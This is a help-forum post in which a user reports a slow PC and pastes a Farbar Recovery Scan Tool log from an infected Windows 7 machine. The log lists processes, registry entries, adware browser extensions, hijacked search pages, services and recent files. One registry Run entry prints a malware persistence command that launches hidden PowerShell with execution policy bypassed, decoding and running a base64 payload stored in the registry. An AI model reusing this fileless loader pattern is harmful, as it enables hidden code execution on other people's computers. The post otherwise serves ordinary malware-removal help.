Virus making my PC so slow


7 replies to this topic

#1 Marnel

  • Members
  • 52 posts
  • Gender:Male
  • Location:Philippines

Posted 11 November 2015 - 11:41 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-11-2015
Ran by user (administrator) on BAUTISTA (12-11-2015 12:29:07)
Running from C:\Users\user\Downloads
Loaded Profiles: user (Available Profiles: user)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-Agent.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
() D:\GAMES\ONLINE GAMES\Garena Plus\ggdllhost.exe
() C:\Users\user\AppData\Roaming\Settings Manager\SettingsManager.exe
() C:\Users\user\AppData\Roaming\Update Manager\UM.EXE
() D:\GAMES\ONLINE GAMES\Garena Plus\GarenaMessenger.exe
() D:\GAMES\ONLINE GAMES\Garena Plus\bbtalk\BBTalk.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\...\Run: [USB Security] => C:\Program Files (x86)\USB Disk Security\USBGuard.exe [695528 2015-01-31] (Zbshareware Lab)
HKLM-x32\...\Run: [MalwareProtectionLive] => C:\Users\user\AppData\Local\MalwareProtectionLive\MalwareProtectionClient.exe [851488 2015-11-06] ()
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [1024412975] => C:\ProgramData\mscmcnfo.exe [72545408 2010-11-20] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [GarenaPlus] => D:\GAMES\ONLINE GAMES\Garena Plus\GarenaMessenger.exe [10027968 2015-10-09] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2013-04-22] (Microsoft Corporation)
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Browser Extensions] => C:\Users\user\AppData\Roaming\BrowserExtensions\BEHelper.exe [540656 2015-06-09] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Settings Manager] => C:\Users\user\AppData\Roaming\Settings Manager\SettingsManager.EXE [969840 2015-11-03] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [{33D7074C-563D-4D69-875F-595D51FBE7FC}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AhgetfWU').QlGpriXvmdmWTi)));
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [UM] => C:\Users\user\AppData\Roaming\Update Manager\UM.EXE [806064 2015-11-10] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\MountPoints2: G - G:\AutoRun.exe
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\MountPoints2: {1e89a37d-d3c1-11e3-b835-7427ea02c1d4} - E:\AutoRun.exe
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\MountPoints2: {fe4555c4-de52-11e3-b727-7427ea02c1d4} - E:\AutoRun.exe
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\scrnsave.scr [11264 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2014-05-02] (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{19681AF9-0116-4AD2-A0A5-B72A75F7100B}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{598DDEF2-1503-45DC-B1E1-DA6B54F68BE9}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{795FDB82-EDFE-4304-A293-01AFA7CEDC08}: [DhcpNameServer] 192.168.254.254
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = about:blank
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ie
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.msn.com/en-ph/?pc=U270&ocid=U270DHP
hxxp://www.google.com/
SearchScopes: HKU\S-1-5-21-2520790421-254736193-3744350732-1000 -> DefaultScope {3E9AC06D-F60A-4990-AD1C-ACB860F40AE0} URL = hxxps://ph.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=715483&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2520790421-254736193-3744350732-1000 -> {26314958-A633-434B-84F0-AFD107022F56} URL = hxxp://ph.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=407453&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2520790421-254736193-3744350732-1000 -> {3E9AC06D-F60A-4990-AD1C-ACB860F40AE0} URL = hxxps://ph.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=715483&p={searchTerms}
BHO: Browser Extensions -> {34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} -> C:\Users\user\AppData\Roaming\BrowserExtensions\Coupons64.dll [2015-06-09] ()
BHO: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files\AMD\SteadyVideo\SteadyVideo.dll [2012-02-13] (Advanced Micro Devices)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2015-02-08] (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2015-02-08] (Oracle Corporation)
BHO-x32: Browser Extensions -> {34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} -> C:\Users\user\AppData\Roaming\BrowserExtensions\Coupons.dll [2015-06-09] ()
BHO-x32: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll [2012-02-13] (Advanced Micro Devices)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-01-26] (Oracle Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-01-26] (Oracle Corporation)
DPF: HKLM-x32 {48884C41-EFAC-433D-958A-9FADAC41408E} hxxps://www.e-games.com.ph/com/EGamesPlugin.cab
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-07] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-07] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-07] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-07] (Advanced Micro Devices)
 
FireFox:
========
FF ProfilePath: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default
FF DefaultSearchEngine: Yahoo!
FF SelectedSearchEngine: Yahoo!
FF Homepage: hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ff
FF Keyword.URL: hxxps://ph.search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=715483&p=
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_209.dll [2015-07-28] ()
FF Plugin: @java.com/DTPlugin,version=10.75.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2015-02-08] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.75.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2015-02-08] (Oracle Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_209.dll [2015-07-28] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.21.2 -> C:\Windows\SysWOW64\npDeployJava1.dll [2013-06-15] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-01-26] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2010-06-01] (Yahoo! Inc.)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @t.garena.com/garenatalk -> D:\GAMES\ONLINE GAMES\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [2015-01-16] ( Garena)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2520790421-254736193-3744350732-1000: @tools.google.com/Google Update;version=3 -> C:\Users\user\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll [2014-05-10] (Google Inc.)
FF Plugin HKU\S-1-5-21-2520790421-254736193-3744350732-1000: @tools.google.com/Google Update;version=9 -> C:\Users\user\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll [2014-05-10] (Google Inc.)
FF Plugin HKU\S-1-5-21-2520790421-254736193-3744350732-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\user\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-06-08] (Unity Technologies ApS)
FF user.js: detected! => C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\user.js [2015-02-17]
FF SearchPlugin: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\searchplugins\yahoo_ff.xml [2015-08-24]
FF Extension: Low Quality Flash - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\low_quality_flash@pie2k.com [2015-07-28]
FF Extension: Start Page - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{2bc72c53-9bde-4db2-8479-eda9a5e71f4e} [2015-08-24] [not signed]
FF Extension: Ebay Shopping Assistant by Spigot - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{c2fc3c2b-a65a-453c-bf95-101fde56ed1d} [2015-08-24] [not signed]
FF Extension: Slick Savings - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{d3b9472c-f8b1-4a10-935b-1087bac8417f} [2015-08-24] [not signed]
 
Chrome: 
=======
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=en-us
CHR StartupUrls: Default -> "hxxps://ph.search.yahoo.com/?type=715483&fr=yo-yhp-ch"
CHR NewTab: Default -> "chrome-extension://jloeihbcjbkgigodmcacomgfihpiaiip/ntp/newtab.html"
CHR Profile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-04]
CHR Extension: (Google Drive) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-09]
CHR Extension: (YouTube) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-09]
CHR Extension: (Shopping Assistant 40) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cekonfccladjgbdhpgobceahgjdcdbod [2015-11-09]
CHR Extension: (Google Search) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-09]
CHR Extension: (Bing) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2015-07-05]
CHR Extension: (Google Docs Offline) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-05]
CHR Extension: (ClixAddon) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hjnhcgkngeeahimbfhejeaiijecekhba [2015-03-24]
CHR Extension: (New Tab Helper 40) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jloeihbcjbkgigodmcacomgfihpiaiip [2015-08-24]
CHR Extension: (Grammarly Spell Checker & Grammar Checker) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2015-11-12]
CHR Extension: (Sword Art Online Kirito Infection) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkkboefcmihpaclpbbgaiiidhoheammc [2015-05-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-24]
CHR Extension: (Gmail) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
CHR HKU\S-1-5-21-2520790421-254736193-3744350732-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-08-06] (Advanced Micro Devices, Inc.) [File not signed]
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [431920 2014-10-14] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [431920 2014-10-14] (Avira Operations GmbH & Co. KG)
S2 Avira.OE.ServiceHost; C:\Program Files (x86)\Avira\My Avira\Avira.OE.ServiceHost.exe [166192 2014-11-20] (Avira Operations GmbH & Co. KG)
S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [433784 2015-06-17] (BlueStack Systems, Inc.)
R3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [413304 2015-06-17] (BlueStack Systems, Inc.)
R3 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [831096 2015-07-21] (BlueStack Systems, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.149\McCHSvc.exe [289256 2015-06-26] (McAfee, Inc.)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [5267776 2014-01-22] (INCA Internet Co., Ltd.)
S4 TlntSvr; C:\Windows\System32\tlntsvr.exe [81920 2009-07-14] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AODDriver4.1; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [53888 2012-03-05] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [119272 2014-10-14] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131608 2014-10-14] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2014-01-18] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\System32\DRIVERS\avnetflt.sys [43064 2014-10-14] (Avira Operations GmbH & Co. KG)
R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [145528 2015-06-17] (BlueStack Systems)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-11] (Broadcom Corporation)
S3 SDGame; C:\Windows\System32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
U3 TrueSight; C:\Windows\SysWOW64\drivers\TrueSight.sys [33512 2015-01-21] ()
S3 dump_wmimmc; \??\D:\GAMES\ONLINE GAMES\PSO2_Full_Client_2.0221.4\PHANTASYSTARONLINE2\pso2_bin\GameGuard\dump_wmimmc.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X]
S3 gdrv; \??\C:\Windows\gdrv.sys [X]
S3 GGSAFERDriver; \??\D:\GAMES\ONLINE GAMES\Garena Plus\Room\safedrv.sys [X]
S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X]
S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X]
S3 hxsyol; \??\D:\GAMES\ONLINE GAMES\AuraKingdom\avital\hxsy64.sys [X]
S0 ohcmj; System32\drivers\ombsuyy.sys [X]
S3 rqryii; \??\C:\Users\user\Desktop\CCE\ccekrnl.dat [X]
S2 S; C [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-11-12 12:29 - 2015-11-12 12:33 - 00020316 _____ C:\Users\user\Downloads\FRST.txt
2015-11-12 12:28 - 2015-11-12 12:29 - 00000000 ____D C:\FRST
2015-11-12 12:26 - 2015-11-12 12:27 - 02198528 _____ (Farbar) C:\Users\user\Downloads\FRST64.exe
2015-11-12 12:23 - 2015-11-12 12:23 - 00259856 _____ C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
2015-11-12 12:22 - 2015-11-12 12:22 - 00036030 _____ C:\Users\user\Desktop\cc_20151112_122205.reg
2015-11-12 01:25 - 2015-11-12 01:25 - 00025247 _____ C:\Users\user\Downloads\[kat.cr]supergirl.s01e03.hdtv.x264.lol.rartv.torrent
2015-11-12 01:25 - 2015-11-12 01:25 - 00003440 _____ C:\Users\user\Downloads\[kat.cr]limitless.s01e08.hdtv.x264.lol.ettv.torrent
2015-11-12 01:25 - 2015-11-12 01:25 - 00003079 _____ C:\Users\user\Downloads\[kat.cr]izombie.s02e06.hdtv.x264.lol.ettv.torrent
2015-11-12 01:24 - 2015-11-12 01:24 - 00012760 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e22.hdtv.x264.lol.eztv.torrent
2015-11-12 01:24 - 2015-11-12 01:24 - 00003244 _____ C:\Users\user\Downloads\[kat.cr]the.flash.2014.s02e06.hdtv.x264.lol.ettv.torrent
2015-11-12 01:23 - 2015-11-12 01:23 - 00011524 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e21.hdtv.x264.lol.eztv.torrent
2015-11-12 01:22 - 2015-11-12 01:22 - 00021288 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e20.hdtv.x264.lol.ettv.torrent
2015-11-12 01:20 - 2015-11-12 01:20 - 00010383 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e19.hdtv.x264.lol.eztv.torrent
2015-11-12 01:19 - 2015-11-12 01:19 - 00011464 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e18.hdtv.x264.lol.eztv.torrent
2015-11-12 01:19 - 2015-11-12 01:19 - 00010524 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.s01e16.hdtv.x264.lol.eztv.torrent
2015-11-12 01:19 - 2015-11-12 01:19 - 00009166 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e17.hdtv.x264.lol.eztv.torrent
2015-11-12 01:18 - 2015-11-12 01:18 - 00019992 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e15.hdtv.x264.lol.ettv.torrent
2015-11-12 01:17 - 2015-11-12 01:17 - 00009742 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e14.hdtv.x264.lol.eztv.torrent
2015-11-12 01:16 - 2015-11-12 01:16 - 00009486 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e13.hdtv.x264.lol.eztv.torrent
2015-11-12 01:15 - 2015-11-12 01:15 - 00022167 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e12.hdtv.x264.lol.ettv.torrent
2015-11-12 01:15 - 2015-11-12 01:15 - 00010919 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e11.hdtv.x264.lol.eztv.torrent
2015-11-12 01:15 - 2015-11-12 01:15 - 00010446 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e10.hdtv.x264.lol.eztv.torrent
2015-11-12 01:15 - 2015-11-12 01:15 - 00009818 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e09.hdtv.x264.lol.eztv.torrent
2015-11-12 01:02 - 2015-11-12 01:02 - 00021962 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e08.hdtv.x264.lol.ettv.torrent
2015-11-10 11:49 - 2015-11-10 11:49 - 00000000 ____D C:\Users\user\AppData\Roaming\Update Manager
2015-11-10 10:48 - 2015-11-10 10:48 - 00000000 ____D C:\Users\user\AppData\Roaming\LolClient
2015-11-10 10:47 - 2015-11-10 10:47 - 00000723 _____ C:\Users\Public\Desktop\League of Legends.lnk
2015-11-10 08:40 - 2015-11-10 08:40 - 00021944 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e07.hdtv.x264.lol.ettv.torrent
2015-11-10 05:53 - 2015-11-10 05:53 - 00010923 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e06.hdtv.x264.lol.eztv.torrent
2015-11-10 05:52 - 2015-11-10 05:52 - 00011084 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e05.hdtv.x264.lol.eztv.torrent
2015-11-10 05:43 - 2015-11-10 05:43 - 00000000 ____D C:\GarenaDownload
2015-11-10 03:44 - 2015-11-10 03:48 - 18304504 _____ C:\Users\user\Downloads\League of Legends.exe
2015-11-06 02:30 - 2015-02-21 22:55 - 237500960 _____ C:\Users\user\Desktop\VID_20150221_225537.3gp
2015-11-06 02:30 - 2015-02-21 22:50 - 48747679 _____ C:\Users\user\Desktop\VID_20150221_225011.3gp
2015-11-06 02:11 - 2015-04-14 21:12 - 61040628 _____ C:\Users\user\Desktop\VID_20150414_211202.3gp
2015-11-06 02:11 - 2015-04-14 18:57 - 53524937 _____ C:\Users\user\Desktop\VID_20150414_185714.3gp
2015-11-06 02:11 - 2015-04-14 18:27 - 26571286 _____ C:\Users\user\Desktop\VID_20150414_182753.3gp
2015-11-06 02:11 - 2015-04-14 17:44 - 43067706 _____ C:\Users\user\Desktop\VID_20150414_174450.3gp
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-11-12 12:34 - 2014-02-20 23:47 - 00000000 ____D C:\Users\user\AppData\Roaming\Skype
2015-11-12 12:30 - 2009-07-14 12:45 - 00009696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-11-12 12:30 - 2009-07-14 12:45 - 00009696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-11-12 12:25 - 2014-08-02 23:57 - 01090310 _____ C:\Windows\WindowsUpdate.log
2015-11-12 12:21 - 2014-01-31 13:10 - 00000000 ____D C:\Users\user\AppData\Roaming\Media Player Classic
2015-11-12 12:21 - 2014-01-19 19:56 - 00000000 ____D C:\Users\user\AppData\Roaming\BitTorrent
2015-11-12 12:07 - 2012-10-22 09:20 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-11-12 12:07 - 2012-10-22 09:20 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
